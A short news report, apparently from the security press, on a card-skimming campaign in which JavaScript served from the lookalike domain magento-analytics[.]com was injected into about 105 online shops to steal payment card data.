While monitoring a malicious domain, www.magento-analytics[.]com, for over last seven months, researchers found that the attackers have been injecting malicious JS scripts hosted on this domain into hundreds of online shopping websites.
Further analysis revealed that the malicious script send stolen payment card data to file hosted on the magento-analytics[.]com server controlled by the attackers.
“Take one victim as an example, www.kings2.com, when a user loads its homepage, the JS runs as well. If a user selects a product and goes to the ‘Payment Information’ to submit the credit card information, after the CVV data is entered, the credit card information will be uploaded,” researchers explain in a blog post published today.
Having Magento in the domain name doesn’t mean that the malicious domain is anyhow associated with the popular Magento ecommerce CMS platform; instead the attackers used this keyword to disguise their activities and confuse regular users.
The malicious domain used in the campaign is registered in Panama, however, in recent months, the IP address moved around from “United States, Arizona” to “Russia, Moscow,” then to “China, Hong Kong.”
While researchers found that the malicious domain has been stealing credit cards information for at least five months with a total of 105 websites already infected with the malicious JS, they believe this number could be higher than what appeared on their radar.